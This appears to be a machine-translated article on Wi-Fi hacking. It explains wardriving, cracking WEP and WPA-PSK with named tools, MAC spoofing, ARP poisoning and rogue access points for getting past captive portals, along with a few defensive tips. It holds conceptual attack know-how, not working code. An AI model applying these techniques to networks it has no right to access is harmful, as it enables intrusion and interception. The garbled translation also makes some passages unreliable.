Wireless Security (Hacking Wifi)

by Josua M Sinambelaemail josh at gadjahmada.edu
website http://josh.staff.ugm.ac.id

Wifi network has more disadvantages than with the cable network. Currently, the development of technology wifi is very significant in line with the needs of a mobile information system. Many wireless service providers such as commercial hotspot, ISP, Warnet, campuses and offices have been using the wifi network on each, but very little attention to the security of data communications on the network is wireless. This makes the hacker be interested to mengexplore keamampuannya to do various illegal activities, which are usually use the wifi.
In this article will discuss various types of activities and methods that the hacker or wireless in the beginners do wardriving. Wardriving is an activity or activities to obtain information about a wifi network and gain access to the wireless network. Generally, aims to get internet connection, but also a lot to do for purposes ranging from a certain sense keingintahuan, try try, research, praktikum tasks, and other crimes.

Wireless Weakness

The weakness of wireless networks in general can be divided into 2 types, namely the weakness in the configuration and the weakness on the type of encryption used. One example of the weakness in the configuration because at this time to build a wireless network is easy. Many vendors that provide facilities that ease the user or network administrator, so often found that wireless is still using the default configuration wireless vendor default. Writers often find that wireless is installed on the network is still using the default settings, such as vendor default SSID, IP Address, remote management, DHCP enable, channel frequency, even without encryption user / password for the wireless administration.
WEP (wired equivalent privacy) is a wireless security standard before, at this time can easily be solved with a variety of free tools available on the internet. WPA-PSK, and LEAP is considered to be the solution replaces WEP, at this time also can be solved with the method in cti onary tack at offline.


Some of the events and activities for the mengamanan wireless networks, among others:
1. Many administrators hide the SSID hiding Services Set Id (SSID) wireless network with the intention that they only know the SSID can be connected to their network. This is not correct, because the SSID is not able disembuyikan perfectly. At a certain time or especially when the client is connected (as he te sauce) or when it will decide themselves (d eaut he nti cati on) of a wireless network, then the client will still send the SSID in the form of plain text (even though using encryption), so if we intend menyadapnya, can easily find information. Some tools that can be used to obtain the SSID dihidden among others, kismet (kisMAC), ssid_jack (airjack), aircrack, void11 and many more.

2. Wireless security only with the WEP key is the standard WEP security encryption & first used in wireless, WEP has many weaknesses, among others:
*key problem the weak, the RC4 algorithm used can be solved.
*WEP key using a static
*niti a problem i li z ati on vector (IV) WEP
*Problems integrity message Redundan C ycl ic cy Check (CRC-32) WEP consists of two levels, ie, 64-bit key, and 128 bits.
In fact the key to the secret 64-bit WEP key is only 40 bits, while the 24bit initialisation vectors (IV). Similarly in the 128-bit WEP key, secret key consists of 104bit.
Attacks on WEP weaknesses, among others: - The attack on the weaknesses initialisation vectors (IV), often called the FMS attack. FMS stands for the name of the three inventors of weakness IV Fluhrer, Mantin, and Shamir. The attack is carried out by a weak IV collect as much as possible. The more the weak IV, quickly found the key that is used.

- Obtain a unique IV through the packet data to be processed for the process of cracking the WEP key more quickly. This is called chopping attack, was first found by h1kari. This technique only requires a unique IV will reduce the need IV to the weak in WEP cracking.
- Second attack takes over the packet and simply, to shorten the time, the hackers usually do t raf fi ci nject ion. Tr aff ic Inj ec tion that is often done with the way the ARP packet and send back to the access point. This resulted in the initial vector collection easier and faster.
Unlike the first and second attack, to attack t raf fi c inj ect ion, required specifications and application specific tools that rarely found in shops, from the chipsets, firmware version, and the driver version, and not infrequently have to do patching of the driver and application.

3. Only with the wireless security key WPA-PSK or WPA2-PSK WPA security while technology is created to replace WEP. There are two types of personal WPA (WPA-PSK), and WPA-RADIUS. While this may have been a crack in the WPA-PSK, which is the method of brute force attack offline. Brute force with a try-try to use many words from a dictionary. This attack will be successful if the passphrase used wireless indeed terapat in the dictionary of words that used the hacker.
To prevent attacks against the security of wireless use WPA-PSK, use a long passphrase (one sentence).
Which is very popular tools used to attack this is CoWPAtty (http://www.churchofwifi.org/) and aircrack (http://www.aircrack-ng.org). Tools will need a list of words or wordli st, can be taken from http://wordlist.sourceforge.net/

4. MAC Filtering
Almost every wireless access point or router with security facilitated MAC Filtering. This is actually not much help to secure the wireless communication, because the MAC address is easy dispoofing or even amended.
Tools fconf ig i OS on Linux / Unix or a variety of network tools spt utilitis, regedit, smac, machange on windows OS with easy to use spoofing to change or MAC address.
The author is still often find wifi in the office and even the ISP (which is usually used by the cafe-cafe), which use only the protection MAC Filtering. By using wardriving applications like kismet / kisMAC or aircrack tools, information can be obtained from the MAC address of each client that are connected to an Access Point.
After getting this information, we can connect to the access point with the MAC in accordance with the client earlier. In the wireless network, MAC address duplication does not lead to conflict. Only need a different IP client with the earlier

5. Infrastructure captive captive Portal Portal originally designed for a community that allows all people can connect (open network). Captive portal is actually a router or gateway machine that does not protect or allow the user traffic to make registration / authentication. Here's how working captive portal:
*users with wireless client allowed to connect wireless to get the IP address (DHCP)
*block all traffic except for the captive portal (Registration / web-based authentication), which is located on the cable network.
*redirect all web traffic to the captive portal
*after the user to register or login, allow access to the network (internet)

Some things to note, that the captive portal only make tracking client connections based on IP and MAC address after authentication. This makes captive portal is still possible without the use of authentication for IP and MAC address can dispoofing. The attack with the MAC and IP spoofing. MAC address spoofing, as already described in section 4 above. Medium to IP spoofing, which required more effort to take advantage of the ARP cache poisoning, we can redirect traffic from the client that has been connected before.
The attack that is easy enough to use Rogue AP, Access Point that is set up (usually use HostAP) that use components such as the same information as the target AP SSID, BSSID to the frequency channel is used. So when a client that will connect to the AP made us, we can divert traffic to the actual AP.
Not infrequently captive portal built on a hotspot have weaknesses in their network design or configuration. For example, authentication is still using plain text (http), network management can be accessed via wireless (located on a network), and many more.
Another weakness of the captive portal is that the data communications traffic or when it is doing authentication (connected to the network) will be still not encrypted, so that it can easily disadap by the hacker. For that need to be careful connect hotspot on the network, to carry on using a secure communications protocol such as https, pop3s, ssh, imaps dst